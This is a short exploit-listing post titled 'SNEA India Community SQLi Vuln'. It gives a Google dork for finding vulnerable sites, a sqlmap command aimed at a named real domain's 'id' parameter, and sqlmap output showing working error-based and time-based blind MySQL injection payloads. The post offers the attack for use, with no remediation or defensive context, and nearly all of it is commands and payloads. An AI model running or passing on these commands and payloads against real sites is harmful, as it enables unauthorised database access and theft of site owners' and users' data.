SNEA India Community SQLi Vuln

2017.06.05

HocaXD (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"index.php?id=" intext:"Today" intitle:"SNEA"

##################################################
# Exploit Title: SNEA India Community SQLi Vuln.
# Google Dork: inurl:"index.php?id=" intext:"Today" intitle:"SNEA"
# Date: 05.06.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
##################################################
# CVE: sqlmap -u "http://www.sneaindia.com/index.php?id=15'" --dbs --random-agent 
[+] sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-1653 OR 1 GROUP BY CONCAT(0x71626a7171,(SELECT (CASE WHEN (7305=7305) THEN 1 ELSE 0 END)),0x71716a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (3613=3613) THEN SLEEP(5) ELSE 3613 END)
---
[02:16:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
##################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SNEA India Community SQLi Vuln

Dork: inurl:"index.php?id=" intext:"Today" intitle:"SNEA"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.